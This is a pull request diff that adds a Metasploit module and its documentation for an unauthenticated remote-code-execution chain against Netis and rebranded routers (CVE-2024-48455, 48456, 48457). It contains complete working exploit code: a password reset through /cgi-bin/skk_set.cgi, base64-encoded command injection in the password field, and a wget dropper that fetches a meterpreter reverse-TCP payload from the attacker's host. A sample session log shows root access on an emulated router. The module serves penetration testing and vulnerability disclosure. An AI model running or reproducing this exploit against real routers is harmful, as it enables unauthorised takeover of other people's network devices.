### PR TITLE
Netis Router Exploit Chain Reactor [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457]

### DIFF
--- a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.md
+++ b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.md
@@ -97,7 +97,7 @@ PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data.
 --- 192.168.1.254 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
 rtt min/avg/max/mdev = 1.297/5.979/11.713/4.316 ms
- # nmap 192.168.1.1
+ # nmap 192.168.1.254
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:39 UTC
 Nmap scan report for 192.168.1.254
 Host is up (0.020s latency).
@@ -192,7 +192,7 @@ Description:
   attacker to reset the Wifi and router password, hence gaining full admin access to the router to execute the RCE.
 
   Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
-  information of the router which can be used by the attacker to determine of the router is running specific vulnerable
+  information of the router which can be used by the attacker to determine if the router is running specific vulnerable
   firmware.
 
   The following router firmware versions are vulnerable:
@@ -283,7 +283,7 @@ Staged payloads might core dump on the target, so use stage-less payloads when u
 Another limitation is that the router has a very limited command set that can be leveraged,
 so the only option is to use the `wget` command to drop an executable on the target to get a session.
 Chained command lines using `;` do not work, so each command need to be executed in a separate request
-with delay of 30 seconds of more to avoid session locking (see the `CMD_DELAY` option).
+with a delay of 30 seconds or more to avoid session locking (see the `CMD_DELAY` option).
 
 Last but not least, be mindful that the admin router password gets overwritten by the exploit,
-resulting in a clear indicator of comprise.
+resulting in a clear indicator of compromise.

--- a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.md
+++ b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.md
@@ -1,0 +1,289 @@
+## Vulnerable Application
+Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection vulnerability at the change
+password page of the router web interface (see [CVE-2024-48456](https://www.cve.org/CVERecord?id=CVE-2024-48456) for more details).
+The vulnerability stems from improper handling of the password and new password parameter within the router's web interface.
+Attackers can inject a command in the password or new password parameter, encoded in base64, to exploit the command injection
+vulnerability.
+When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
+An attacker needs to be authenticated to initiate this RCE, however [CVE-2024-48457](https://www.cve.org/CVERecord?id=CVE-2024-48457)
+allows an unauthenticated attacker to reset the Wifi and router password, hence gaining full root access to the router to execute
+the RCE.
+
+Last but not least, [CVE-2024-48455](https://www.cve.org/CVERecord?id=CVE-2024-48455) allows for unauthenticated information disclosure
+revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running
+specific vulnerable firmware.
+
+The following router firmware versions are vulnerable:
+
+- [x] netis_MW5360_V1.0.1.3031_fw.bin
+- [x] Netis_MW5360-1.0.1.3442.bin
+- [x] Netis_MW5360_RUSSIA_844.bin
+- [x] netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+- [x] netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+- [x] netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+- [x] netis_NC65_V3.0.0.3749.bin
+- [x] Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+- [x] Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+- [x] netis_NX10_V2.0.1.3582_fw.bin
+- [x] netis_NX10_V2.0.1.3643.bin
+- [x] Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+- [x] netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+- [x] Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+- [x] GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+
+and potentially others...
+
+## Installation
+Ideally, to test this module, you would need a vulnerable Netis Router device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the Netis devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* This requires additional [installation steps](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download the vulnerable firmware from Netis or from one of the other brands like GLCtec or Stonet.
+* We will pick `GLC_ALPHA_AC3-V3.0.2.115.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d Netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin`
+* This will take a while, but in the end you should see the following...
+```shell
+ # ./run.sh -d netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin
+[*] /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+[IID] 15
+[MODE] debug
+[+] Network reachable on 192.168.1.254!
+[+] Web service on 192.168.1.254
+[+] Run debug!
+Creating TAP device tap15_0...
+Set 'tap15_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.254 true true 79.316641060 186.772281412
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - GLC_ALPHA_AC3-V3.0.2.115
+[*] IP - 192.168.1.254
+[*] connecting to netcat (192.168.1.254:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+```
+* check if you can `ping` the emulated router and run `nmap` to check the ports
+```shell
+ # ping 192.168.1.254
+PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data.
+64 bytes from 192.168.1.254: icmp_seq=1 ttl=64 time=11.7 ms
+64 bytes from 192.168.1.254: icmp_seq=2 ttl=64 time=4.93 ms
+64 bytes from 192.168.1.254: icmp_seq=3 ttl=64 time=1.30 ms
+^C
+--- 192.168.1.254 ping statistics ---
+3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+rtt min/avg/max/mdev = 1.297/5.979/11.713/4.316 ms
+ # nmap 192.168.1.1
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:39 UTC
+Nmap scan report for 192.168.1.254
+Host is up (0.020s latency).
+Not shown: 996 closed tcp ports (reset)
+PORT    STATE SERVICE
+22/tcp  open  ssh
+53/tcp  open  domain
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 00:E0:4C:81:96:C1 (Realtek Semiconductor)
+
+Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.1.254
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `Meterpreter` session.
+
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > info
+
+       Name: Netis Router Exploit Chain Reactor (CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457).
+     Module: exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457
+   Platform: Linux
+       Arch: mipsle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-12-27
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  CMD_DELAY  30               yes       Delay in seconds between payload commands to avoid locking
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.1.254    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
+                                        s/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Netis router endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                      local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection
+  vulnerability at the change admin password page of the router web interface (see CVE-2024-48456 for more details).
+  The vulnerability stems from improper handling of the 'password' and 'new password' parameter within the
+  router's web interface. Attackers can inject a command in the 'password' or 'new password' parameter,
+  encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
+  command execution, potentially allowing the attacker to take full control of the router.
+  An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
+  attacker to reset the Wifi and router password, hence gaining full admin access to the router to execute the RCE.
+
+  Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
+  information of the router which can be used by the attacker to determine of the router is running specific vulnerable
+  firmware.
+
+  The following router firmware versions are vulnerable:
+  * netis_MW5360_V1.0.1.3031_fw.bin
+  * Netis_MW5360-1.0.1.3442.bin
+  * Netis_MW5360_RUSSIA_844.bin
+  * netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+  * netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+  * netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+  * netis_NC65_V3.0.0.3749.bin
+  * Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+  * Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+  * netis_NX10_V2.0.1.3582_fw.bin
+  * netis_NX10_V2.0.1.3643.bin
+  * Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+  * netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+  * Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+  * GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+  * potentially others...
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48455
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48456
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48457
+  https://github.com/users/h00die-gr3y/projects/1
+
+View the full module info with the info -d command.
+```
+## Options
+### CMD_DELAY
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking using the `CMD_DELAY` option.
+
+## Scenarios
+### GLCtec ALPHA-AC3 Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.1.253:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.254:80 can be exploited.
+[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
+[*] Resetting router password for authentication.
+[*] Logging in with the new router password 4vNcez42D to get the password cookie.
+[*] Saving router credentials (root) at the msf database.
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Executing wget -qO /tmp/hMvelDeE http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Client 192.168.1.254 (Wget) requested /ZhIplAe6jD9O7J
+[*] Sending payload to 192.168.1.254 (Wget)
+[*] Command Stager progress -  53.85% done (63/117 bytes)
+[*] Executing chmod +x /tmp/hMvelDeE
+[*] Command Stager progress -  72.65% done (85/117 bytes)
+[*] Executing /tmp/hMvelDeE
+[+] Deleted /tmp/hMvelDeE
+[*] Meterpreter session 7 opened (192.168.1.253:4444 -> 192.168.1.254:54551) at 2024-12-29 11:28:49 +0000
+[*] Command Stager progress -  83.76% done (98/117 bytes)
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.254
+OS           :  (Linux 3.10.90)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > pwd
+/etc/boa
+meterpreter > ls
+Listing: /etc/boa
+=================
+
+Mode              Size     Type  Last modified              Name
+----              ----     ----  -------------              ----
+100755/rwxr-xr-x  9581     fil   2024-03-04 09:22:46 +0000  boa.conf
+100755/rwxr-xr-x  2118     fil   2024-03-04 09:22:46 +0000  mime.types
+
+meterpreter >
+```
+## Limitations
+Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
+Another limitation is that the router has a very limited command set that can be leveraged,
+so the only option is to use the `wget` command to drop an executable on the target to get a session.
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking (see the `CMD_DELAY` option).
+
+Last but not least, be mindful that the admin router password gets overwritten by the exploit,
+resulting in a clear indicator of comprise.

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -102,11 +102,12 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  # CVE-2024-48457: unauthenticated password reset that resets the Wifi and admin password of the router
+  # CVE-2024-48457: unauthenticated password reset that resets the Wifi and root password of the router
   # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/start_wifi.sh
-  def set_admin_password
-    @password = Base64.strict_encode64(Rex::Text.rand_text_alphanumeric(8..12))
-    print_status('Resetting admin password for authentication.')
+  def set_router_password
+    @password = Rex::Text.rand_text_alphanumeric(8..12)
+    password_b64 = Base64.strict_encode64(@password)
+    print_status('Resetting router password for authentication.')
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
@@ -114,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'wl_idx' => 0,
         'wlanMode' => 0,
         'encrypt' => 4,
-        'wpaPsk' => @password,
+        'wpaPsk' => password_b64,
         'wpaPskType' => 2,
         'wpaPskFormat' => 0,
-        'password' => @password,
+        'password' => password_b64,
         'autoUpdate' => 0,
         'firstSetup' => 1,
         'quick_set' => 'ap',
@@ -127,19 +128,19 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     # in some cases no SUCCESS response is returned however the password has been set succesfully
     # therefore check if the login is successfull and get the password cookie
-    print_status("Logging in with the new admin password #{@password} to get the password cookie.")
+    print_status("Logging in with the new router password #{@password} to get the password cookie.")
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/cgi-bin/login.cgi'),
       'keep_cookies' => true,
       'vars_post' => {
-        'password' => @password
+        'password' => password_b64
       }
     })
     return res&.code == 200 && res.body.include?('SUCCESS')
   end
 
-  # CVE-2024-48456: remote code execution in the parameter password at the change admin password page at
+  # CVE-2024-48456: remote code execution in the parameter password at the change password page at
   # the router web interface
   # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/password.sh
   def execute_command(cmd, _opts = {})
@@ -217,10 +218,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    fail_with(Failure::NoAccess, 'Unable to set the router admin password and retrieve the password cookie.') unless set_admin_password
+    fail_with(Failure::NoAccess, 'Unable to set the router password and retrieve the password cookie.') unless set_router_password
 
     # store router admin password in msf database which is also the password of root ;-)
-    print_status('Saving admin/root credentials at the msf database.')
+    print_status('Saving router credentials (root) at the msf database.')
     store_valid_credential(user: 'root', private: @password)
 
     # wait a while with exploit execution to avoid locking

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -45,10 +45,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-48455'],
           ['CVE', '2024-48456'],
           ['CVE', '2024-48457'],
-          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-48456'],
-          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
+          ['URL', 'https://attackerkb.com/topics/L6qgmDIMa1/cve-2024-48455'],
+          ['URL', 'https://attackerkb.com/topics/Urqj4ggP4j/cve-2024-48456'],
+          ['URL', 'https://attackerkb.com/topics/ty1TOgc40f/cve-2024-48457'],
+          ['URL', 'https://github.com/users/h00die-gr3y/projects/1']
         ],
-        'DisclosureDate' => '2024-06-07',
+        'DisclosureDate' => '2024-12-27',
         'Platform' => ['linux'],
         'Arch' => [ARCH_MIPSLE],
         'Privileged' => true,

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -25,16 +25,30 @@ class MetasploitModule < Msf::Exploit::Remote
           command execution, potentially allowing the attacker to take full control of the router.
           An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
           attacker to reset the Wifi and Admin password, hence gaining full admin access to the router to execute the RCE.
-          Last but not least, CVE-2024-48555 allows for unauthenticated information disclosure revealing sensitive configuration
+
+          Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
           information of the router which can be used by the attacker to determine of the router is running specific vulnerable
           firmware.
 
           The following router firmware versions are vulnerable:
-          * Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582;
-          * Netis Wifi 11AC Router NC65 3.0.0.3749;
-          * Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503;
-          * Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329;
-          * Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.303; and
+          * netis_MW5360_V1.0.1.3031_fw.bin
+          * Netis_MW5360-1.0.1.3442.bin
+          * Netis_MW5360_RUSSIA_844.bin
+          * netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+          * netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+          * netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+          * Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+          * netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+          * netis_NC65_V3.0.0.3749.bin
+          * Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+          * Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+          * netis_NX10_V2.0.1.3582_fw.bin
+          * netis_NX10_V2.0.1.3643.bin
+          * Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+          * netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+          * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+          * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+          * Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
           * potentially others
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -1,0 +1,211 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netis router unauthenticated RCE combining CVE-2024-48456 and CVE-2024-48457.',
+        'Description' => %q{
+          Several Netis Routers suffer from a command injection vulnerability at the change admin password page
+          of the router web interface (see CVE-2024-48456 for more details).
+          The vulnerability stems from improper handling of the 'password' and 'new password' parameter within the
+          router's web interface. Attackers can inject a command in the 'password' or 'new password' parameter,
+          encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
+          command execution, potentially allowing the attacker to take full control of the router.
+          An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
+          attacker to reset the Wifi and Admin password, hence gaining full admin access to the router to execute the RCE.
+          Last but not least, CVE-2024-48555 allows for unauthenticated information disclosure revealing sensitive configuration
+          information of the router which can be used by the attacker to determine of the router is running specific vulnerable
+          firmware.
+
+          The following router firmware versions are vulnerable:
+          * Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582;
+          * Netis Wifi 11AC Router NC65 3.0.0.3749;
+          * Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503;
+          * Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329;
+          * Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.303; and
+          * potentially others
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' #  Discovery of the vulnerability and MSF module contributor
+        ],
+        'References' => [
+          ['CVE', '2024-48455'],
+          ['CVE', '2024-48456'],
+          ['CVE', '2024-48457'],
+          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-48456'],
+          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
+        ],
+        'DisclosureDate' => '2024-06-07',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80,
+          'HttpClientTimeout' => 60
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Netis router endpoint URL', '/' ]),
+      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
+    ])
+  end
+
+  # CVE-2024-48457: unauthenticated password reset that resets the Wifi and admin password of the router
+  # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/start_wifi.sh
+  def set_admin_password
+    @password = Base64.strict_encode64(Rex::Text.rand_text_alphanumeric(8..12))
+    print_status('Resetting admin password for authentication.')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
+      'vars_post' => {
+        'wl_idx' => 0,
+        'wlanMode' => 0,
+        'encrypt' => 4,
+        'wpaPsk' => @password,
+        'wpaPskType' => 2,
+        'wpaPskFormat' => 0,
+        'password' => @password,
+        'autoUpdate' => 0,
+        'firstSetup' => 1,
+        'quick_set' => 'ap',
+        'app' => 'wan_set_shortcut',
+        'wl_link' => 0
+      }
+    })
+    # in some cases no SUCCESS response is returned however the password has been set succesfully
+    # therefore check if the login is successfull and get the password cookie
+    print_status('Logging in with admin password to set the password cookie.')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/login.cgi'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'password' => @password
+      }
+    })
+    return true if res && res.code == 200 && res.body.include?('SUCCESS')
+
+    false
+  end
+
+  # CVE-2024-48456: remote code execution in the parameter password at the change admin password page at
+  # the router web interface
+  # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/password.sh
+  def execute_command(cmd, _opts = {})
+    # store name of payload and cleanup payload file when session is established (see def on_new_session)
+    @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
+
+    # skip last command to remove payload because it does not work
+    unless cmd.include?('rm -f')
+      payload = Base64.strict_encode64("`#{cmd}`")
+      print_status("Executing #{cmd}")
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'password' => payload,
+          'new_pwd_confirm' => payload,
+          'passwd_set' => 'passwd_set',
+          'mode_name' => 'skk_set',
+          'app' => 'passwd',
+          'wl_link' => 0
+        }
+      })
+    end
+  end
+
+  def on_new_session(_session)
+    # cleanup payload file
+    register_files_for_cleanup(@payload_name.to_s)
+    super
+  end
+
+  # CVE-2024-48455: information disclosure where an unauthenticated remote attacker can obtain sensitive information
+  # affected components: web endpoint /cgi-bin/skk_set.cgi via the mode_name and wl_link parameter
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
+      'vars_post' => {
+        'mode_name' => 'skk_get',
+        'wl_link' => 0
+      }
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')
+
+    # trying to get the model and version number
+    # unfortunately JSON parsing fails for some routers, so we need to use this ugly REGEX :-(
+    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
+    # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison
+    unless version.nil?
+      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop
+      # The model number part is usually something like Netis(NC63)-V3.0.0.3131,
+      # but occassionally you see things like Stonet-N3D-V3.0.0.4142, or NX10-V3.0.0.4142
+      if version[2].upcase.split('-V')[0].include?('-')
+        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
+      elsif version[2].upcase.split('-V')[0].include?('(')
+        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
+      else
+        model_number = version[2].upcase.split('-V')[0]
+      end
+      # Check if target is vulnerable
+      if version_number
+        case model_number.split('V')[0] # split if any hardware version is part of the model number (NC65V2)
+        when 'NC63', 'NC65', 'NC66', 'NC21', 'NX10', 'NX30', 'NX31', 'NX62', 'MW5360'
+          return CheckCode::Appears(version[2].chop.to_s) if Rex::Version.new(version_number) >= Rex::Version.new('1.0.0.0')
+        end
+        return CheckCode::Safe(version[2].chop.to_s)
+      end
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    fail_with(Failure::NoAccess, 'Unable to set the router admin password and retrieve the password cookie.') unless set_admin_password
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed
+      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])
+    end
+  end
+end

